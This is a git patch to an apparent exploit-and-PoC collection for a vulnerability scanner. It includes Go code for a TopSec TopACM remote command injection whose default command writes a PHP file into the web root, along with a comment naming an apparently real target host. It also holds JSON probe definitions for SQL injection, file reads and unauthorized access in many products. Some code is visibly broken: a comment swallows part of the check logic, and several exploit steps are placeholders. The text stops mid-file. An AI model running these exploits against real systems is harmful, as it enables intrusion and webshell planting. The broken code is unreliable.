From 49d3b9c637981ac4a15c55ca1a32be67445f3d84 Mon Sep 17 00:00:00 2001 From: test Date: Wed, 30 Nov 2022 12:20:28 +0000 Subject: [PATCH] auto --- README.md | 2 +- go/TopSec_TopACM_Remote_Command_Execution.go | 152 +++--- go/poc.go | 373 ++------------ json/360_TianQing_ccid_SQL_injectable.json | 69 ++- ...nqing_database_information_disclosure.json | 67 ++- json/Active_UC_index.action_RCE.json | 53 +- ...Alibaba_Nacos_Add_user_not_authorized.json | 69 ++- json/Alibaba_Nacos_Default_password.json | 65 ++- json/Apache_Airflow_Unauthorized.json | 53 +- ...Apache_Kylin_Console_Default_password.json | 61 ++- ...Unauthorized_configuration_disclosure.json | 53 +- json/Apache_Solr_Arbitrary_File_Read.json | 308 ++++++------ json/Aspcms_Backend_Leak.json | 12 +- ...fluence_OGNL_injection_CVE_2021_26084.json | 455 +++++++++++++++++- json/Cacti_Weathermap_File_Write.json | 14 +- json/ClickHouse_SQLI.json | 53 +- json/Consul_Rexec_RCE.json | 49 +- json/Datang_AC_Default_Password.json | 14 +- json/DedeCMS_Carbuyaction_FileInclude.json | 49 +- json/Discuz_RCE_WOOYUN_2010_080723.json | 53 +- json/Discuz_Wechat_Plugins_Unauth.json | 53 +- json/Discuz_v72_SQLI.json | 53 +- json/Docker_Registry_API_Unauth.json | 51 +- json/Fastmeeting_Arbitrary_File_Read.json | 14 +- ...ineReport_v9_Arbitrary_File_Overwrite.json | 51 +- json/GitLab_SSRF_CVE_2021_22214.json | 99 ++-- json/H3C_IMC_RCE.json | 52 +- ...000_Smart_station_Unauthorized_access.json | 63 +-- json/IceWarp_WebClient_basic_RCE.json | 53 +- ...ed_Abritrary_File_Read_CVE_2021_21402.json | 90 +--- json/Jitong_EWEBS_phpinfo_leak.json | 62 ++- json/Konga_Default_JWT_KEY.json | 12 +- ...oxy_Directory_traversal_CVE_2021_3019.json | 121 ++--- json/OpenSNS_RCE.json | 48 +- json/RuoYi_Druid_Unauthorized_access.json | 63 ++- json/Samsung_WLAN_AP_WEA453e_RCE.json | 82 +++- json/Samsung_WLAN_AP_wea453e_router_RCE.json | 253 +++++++--- json/Security_Devices_Hardcoded_Password.json | 14 +- json/SonarQube_unauth_CVE_2020_27986.json | 52 +- ...tions_Manager_API_SSRF_CVE_2021_21975.json | 31 +- ...re_vCenter_v7.0.2_Arbitrary_File_Read.json | 6 +- json/Weaver_OA_8_SQL_injection.json | 28 +- json/YAPI_RCE.json | 54 ++- json/alibaba_canal_default_password.json | 26 +- json/content.json | 1 + ...ahuo100_sql_injection_CNVD_2021_30193.json | 28 +- 46 files changed, 2152 insertions(+), 1332 deletions(-) create mode 100644 json/content.json diff --git a/README.md b/README.md index 0857fe3..4856e4c 100644 --- a/README.md +++ b/README.md @@ -2,4 +2,4 @@ | 文件类型 | 数量 | | :----:| :----: | | .go | 79 | -| .json | 862 | \ No newline at end of file +| .json | 863 | \ No newline at end of file diff --git a/go/TopSec_TopACM_Remote_Command_Execution.go b/go/TopSec_TopACM_Remote_Command_Execution.go index ab95cac..03960d9 100644 --- a/go/TopSec_TopACM_Remote_Command_Execution.go +++ b/go/TopSec_TopACM_Remote_Command_Execution.go @@ -1,77 +1,77 @@ -package exploits - -import ( - "git.gobies.org/goby/goscanner/goutils" - "git.gobies.org/goby/goscanner/jsonvul" - "git.gobies.org/goby/goscanner/scanconfig" - "git.gobies.org/goby/httpclient" - "net/url" - "strings" -) - -func init() { - expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"

天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","Recommendation":"

目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html

","Impact":"

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` - - exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { - // 攻击 URL - requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) - requestConfig.VerifyTls = false - requestConfig.FollowRedirect = false - requestConfig.Timeout = 15 - - // 发送攻击请求 - if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { - if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { - return true - } - } - return false - } - - checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { - // 攻击 URL - requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") - requestConfig.VerifyTls = false - requestConfig.FollowRedirect = false - requestConfig.Timeout = 15 - - // 发送攻击请求 - if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { - if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) { - return true - } - } - return false - } - - ExpManager.AddExploit(NewExploit( - goutils.GetFileName(), - expJson, - func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { - - // 生成随机文件名 - randomFileName := goutils.RandomHexString(6) - - // 漏洞攻击包,POC 使用自删除的文件 - // /var/www/html/"+randomFileName+".php", u) { - return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) - } - - return false - }, - func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { - - cmd := ss.Params["cmd"].(string) - - if exploitTopACM092348783482(cmd, expResult.HostInfo) { - expResult.Success = true - expResult.Output = "命令执行成功" - } - - return expResult - }, - )) -} - +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "net/url" + "strings" +) + +func init() { + expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"

天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","Recommendation":"

目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html

","Impact":"

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` + + exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { + return true + } + } + return false + } + + checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) { + return true + } + } + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + // 生成随机文件名 + randomFileName := goutils.RandomHexString(6) + + // 漏洞攻击包,POC 使用自删除的文件 + // /var/www/html/"+randomFileName+".php", u) { + return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + cmd := ss.Params["cmd"].(string) + + if exploitTopACM092348783482(cmd, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "命令执行成功" + } + + return expResult + }, + )) +} + // https://heiwado.cn:8443/ \ No newline at end of file diff --git a/go/poc.go b/go/poc.go index 9ef1440..ed5d654 100644 --- a/go/poc.go +++ b/go/poc.go @@ -1,332 +1,53 @@ -package goby +package gobypoc -import ( - "encoding/json" - "github.com/niudaii/zpscan/internal/utils" - "github.com/niudaii/zpscan/pkg/pocscan/cel/proto" - "io/ioutil" - "strconv" - "strings" -) - -type Poc struct { - Name string `json:"Name"` - Description string `json:"Description"` - Product string `json:"Product"` - Homepage string `json:"Homepage"` - DisclosureDate string `json:"DisclosureDate"` - Author string `json:"Author"` - FofaQuery string `json:"FofaQuery"` - GobyQuery string `json:"GobyQuery"` - Level string `json:"Level"` - Impact string `json:"Impact"` - VulType []interface{} `json:"VulType"` - CVEIDs []interface{} `json:"CVEIDs"` - CNNVD []interface{} `json:"CNNVD"` - CNVD []interface{} `json:"CNVD"` - CVSSScore string `json:"CVSSScore"` - Is0Day bool `json:"Is0day"` - Recommendation string `json:"Recommendation"` - Translation struct { - CN struct { - Name string `json:"Name"` - Product string `json:"Product"` - Description string `json:"Description"` - Recommendation string `json:"Recommendation"` - Impact string `json:"Impact"` - VulType []interface{} `json:"VulType"` - Tags []interface{} `json:"Tags"` - } `json:"CN"` - EN struct { - Name string `json:"Name"` - Product string `json:"Product"` - Description string `json:"Description"` - Recommendation string `json:"Recommendation"` - Impact string `json:"Impact"` - VulType []interface{} `json:"VulType"` - Tags []interface{} `json:"Tags"` - } `json:"EN"` - } `json:"Translation"` - References []string `json:"References"` - HasExp bool `json:"HasExp"` - ExpParams interface{} `json:"ExpParams"` - ExpTips struct { - Type string `json:"Type"` - Content string `json:"Content"` - } `json:"ExpTips"` - ScanSteps []interface{} `json:"ScanSteps"` - ExploitSteps interface{} `json:"ExploitSteps"` - Tags interface{} `json:"Tags"` - AttackSurfaces struct { - Application interface{} `json:"Application"` - Support interface{} `json:"Support"` - Service interface{} `json:"Service"` - System interface{} `json:"System"` - Hardware interface{} `json:"Hardware"` - } `json:"AttackSurfaces"` -} - -type Rule struct { - Request struct { - Data string `json:"data"` - DataType string `json:"data_type"` - FollowRedirect bool `json:"follow_redirect"` - Header map[string]string `json:"header"` - Method string `json:"method"` - Uri string `json:"uri"` - } `json:"Request"` - ResponseTest struct { - Checks []Checks `json:"checks"` - Operation string `json:"operation"` - Type string `json:"type"` - } `json:"ResponseTest"` - SetVariable []interface{} `json:"SetVariable"` -} - -type Checks struct { - Bz string `json:"bz"` - Operation string `json:"operation"` +type Check struct { Type string `json:"type"` - Value string `json:"value"` Variable string `json:"variable"` + Operation string `json:"operation"` + Value string `json:"value"` + Bz string `json:"bz"` +} +type ResponseTest struct { + Type string `json:"type"` + Operation string `json:"operation"` + Checks []Check `json:"checks"` +} +type Request struct { + Method string `json:"method"` + Uri string `json:"uri"` + FollowRedirect bool `json:"follow_redirect"` + Header map[string]string `json:"header"` + DataType string `json:"data_type"` + Data string `json:"data"` + SetVariable []string `json:"set_variable"` +} +type ScanStep struct { + Requests Request + ResponseTest ResponseTest + SetVariable []string } -// LoadAllPoc 加载全部poc -func LoadAllPoc(pocDir string) (pocs []*Poc, err error) { - var pocPathList []string - pocPathList, err = utils.GetAllFile(pocDir) - if err != nil { - return - } - for _, pocPath := range pocPathList { - if !strings.HasSuffix(pocPath, ".json") { - continue - } - var poc Poc - var bytes []byte - bytes, err = ioutil.ReadFile(pocPath) - if err != nil { - return - } - err = json.Unmarshal(bytes, &poc) - if err != nil { - return - } - pocs = append(pocs, &poc) - } - return -} - -// CheckResult checks -func (r *Rule) CheckResult(preq *proto.Response) bool { - var result []bool - var result1 bool - for _, check := range r.ResponseTest.Checks { - result1 = CheckOperation(check, preq) - result = append(result, result1) - } - if r.ResponseTest.Operation == "AND" { - for _, res := range result { - if !res { - return false - } - } - return true - } else if r.ResponseTest.Operation == "OR" { - for _, res := range result { - if res { - return true - } - } - } - return false -} - -// CheckOperation operation -func CheckOperation(check Checks, preq *proto.Response) bool { - switch { - case strings.EqualFold(check.Operation, "contains"): - { - if check.Variable == "$body" { - if strings.Contains(string(preq.Body), check.Value) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if strings.Contains(header, check.Value) { - return true - } - } - } else if check.Variable == "$code" { - if strings.Contains(strconv.Itoa(int(preq.Status)), check.Value) { - return true - } - } - } - case strings.EqualFold(check.Operation, "not contains"): - { - if check.Variable == "$body" { - if !(strings.Contains(string(preq.Body), check.Value)) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if !(strings.Contains(header, check.Value)) { - return true - } - } - } else if check.Variable == "$code" { - if !(strings.Contains(strconv.Itoa(int(preq.Status)), check.Value)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "start_with"): - { - if check.Variable == "$body" { - if strings.HasPrefix(string(preq.Body), check.Value) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if strings.HasPrefix(header, check.Value) { - return true - } - } - } else if check.Variable == "$code" { - if strings.HasPrefix(strconv.Itoa(int(preq.Status)), check.Value) { - return true - } - } - } - case strings.EqualFold(check.Operation, "end_with"): - { - if check.Variable == "$body" { - if strings.HasSuffix(string(preq.Body), check.Value) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if strings.HasSuffix(header, check.Value) { - return true - } - } - } else if check.Variable == "$code" { - if strings.HasSuffix(strconv.Itoa(int(preq.Status)), check.Value) { - return true - } - } - } - case strings.EqualFold(check.Operation, "=="): - { - if check.Variable == "$body" { - if check.Value == string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value == header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value == strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "!="): - { - if check.Variable == "$body" { - if check.Value != string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value != header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value != strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, ">"): - { - if check.Variable == "$body" { - if check.Value > string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value > header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value > strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "<"): - { - if check.Variable == "$body" { - if check.Value < string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value < header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value < strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, ">="): - { - if check.Variable == "$body" { - if check.Value >= string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value >= header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value >= strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "<="): - { - if check.Variable == "$body" { - if check.Value <= string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value <= header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value <= strconv.Itoa(int(preq.Status)) { - return true - } - } - } - default: - return false - } - return false +type PocJson struct { + Name string `json:"Name"` + Level string `json:"Level"` + Tags []string `json:"Tags"` + Query string `json:"GobyQuery"` + Description string `json:"Description"` + Product string `json:"Product"` + Homepage string `json:"Homepage"` + Author string `json:"Author"` + Impact string `json:"Impact"` + Recommandation string `json:"Recommandation"` + References []string `json:"References"` + HasExp bool `json:"HasExp"` + ExpParams []struct { + Name string `json:"name"` + Type string `json:"type"` + Value string `json:"value"` + Show string `json:"show"` + } `json:"ExpParams"` + ScanSteps []interface{} `json:"ScanSteps"` + ExploitSteps []interface{} `json:"ExploitSteps"` + PostTime string `json:"PostTime"` + Version string `json:"GobyVersion"` } diff --git a/json/360_TianQing_ccid_SQL_injectable.json b/json/360_TianQing_ccid_SQL_injectable.json index d1e079b..779eaec 100644 --- a/json/360_TianQing_ccid_SQL_injectable.json +++ b/json/360_TianQing_ccid_SQL_injectable.json @@ -1,17 +1,23 @@ { "Name": "360 TianQing ccid SQL injectable", "Level": "2", - "Tags": [], - "GobyQuery": "app=\"360-TianQing\"", - "Description": "The attacker can get the server permission by injecting SQL into the upload Trojan", - "Product": "360 TianQing", - "Homepage": "htp://360.cn", - "Author": "PeiQi", - "Impact": "

The attacker can get the server permission by injecting SQL into the upload Trojan

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" + "Tags": [ + "sqli" ], + "GobyQuery": "app=\"360-TianQing\"", + "Description": "", + "Product": "360 TianQing", + "Homepage": "https://360.net/product-center/Endpoint-Security/management-system", + "Author": "", + "Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -19,7 +25,7 @@ "method": "GET", "uri": "/api/dp/rptsvcsyncpoint?ccid=1", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -60,6 +66,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-09 08:51:50", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/360_Tianqing_database_information_disclosure.json b/json/360_Tianqing_database_information_disclosure.json index 1634515..382ad74 100644 --- a/json/360_Tianqing_database_information_disclosure.json +++ b/json/360_Tianqing_database_information_disclosure.json @@ -1,19 +1,23 @@ { - "Name": "360 Tianqing database information disclosure", + "Name": "360 TianQing database information disclosure", "Level": "0", "Tags": [ "Disclosure of Sensitive Information" ], "GobyQuery": "app=\"360-TianQing\"", - "Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information", - "Product": "360 Tianqing", - "Homepage": "https://www.360.cn/", - "Author": "PeiQi", - "Impact": "", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Description": "", + "Product": "360 TianQing", + "Homepage": "https://360.net/product-center/Endpoint-Security/management-system", + "Author": "", + "Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/api/dbstat/gettablessize", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -62,6 +66,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-08 16:04:28", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Active_UC_index.action_RCE.json b/json/Active_UC_index.action_RCE.json index 496366f..5e85e6a 100644 --- a/json/Active_UC_index.action_RCE.json +++ b/json/Active_UC_index.action_RCE.json @@ -1,28 +1,29 @@ { - "Name": "Active UC index.action 远程命令执行漏洞", + 